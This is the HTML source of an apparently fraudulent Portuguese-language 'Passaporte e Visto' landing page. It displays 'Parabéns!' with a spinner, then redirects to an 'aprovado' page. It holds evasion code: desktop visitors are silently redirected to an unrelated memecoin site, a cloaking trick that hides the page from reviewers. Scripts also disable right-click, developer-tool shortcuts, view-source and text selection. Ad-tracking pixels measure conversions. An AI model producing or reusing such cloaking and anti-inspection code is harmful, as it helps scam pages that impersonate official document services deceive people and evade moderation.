<!DOCTYPE html><html lang="pt-BR"><head>
    <script async="" src="js/fbevents.js"></script><script type="text/javascript">
        if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
          window.location.href = 'https://dogwifcoin.org/';
        }
     </script>
     
        <script type="text/javascript">
        var message="Desculpe, o clique com o botão direito foi desativado.";
        function clickIE() {if (document.all) {(message);return false;}}
        function clickNS(e) {if
        (document.layers||(document.getElementById&&!document.all)) {
            if (e.which==2||e.which==3) {(message);return false;}}}
        if (document.layers)
        {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
        else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
        document.oncontextmenu=new Function("return false")
        </script>
        
        <script>
        document.onkeydown = function(e) {
            if(event.keyCode == 123) {
                return false;
            }
            if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){
                return false;
            }
            if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){
                return false;
            }
            if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){
                return false;
            }
        }
        </script>
        
        <script>
        function disableselect(e) {
            return false;
        }
        
        function reEnable() {
            return true;
        }
        
        document.onselectstart = new Function("return false");
        
        if (window.sidebar) {
            document.onmousedown = disableselect;
            document.onclick = reEnable;
        }
        </script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Passaporte e Visto</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        body, html {
            height: 100%;
            margin: 0;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            background-color: #004480; /* Fundo azul */
        }

        .loading-screen {
            color: white;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            text-align: center;
            height: 100%;
            font-family: Arial, sans-serif;
        }

        .loading-message {
            margin-top: 20px;
            font-size: 30px; /* Tamanho maior para destacar */
        }

        .spinner {
            border: 8px solid rgba(255, 255, 255, 0.3);
            border-top: 8px solid white;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
<script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1238265364044087');
    fbq('track', 'PageView');
    </script><script async="" defer="" src="js/pixel.js"></script></head>

    <body><noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=1238265364044087&ev=PageView&noscript=1"
    /></noscript>
    <script>
        window.pixelId = "67243e70e257ad639df7c22c";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>


    <!-- Tela com o Spinner e "Parabéns!" -->
    <div class="loading-screen">
        <div class="spinner"></div>
        <div id="loadingText" class="loading-message">Parabéns!</div>
    </div>

    <script>
        // Função de redirecionamento após 5 segundos
        setTimeout(() => {
            window.location.href = '/aprovado.html'; // Substitua com a URL desejada
        }, 5000); // Redireciona após 5 segundos
    </script>



</body></html>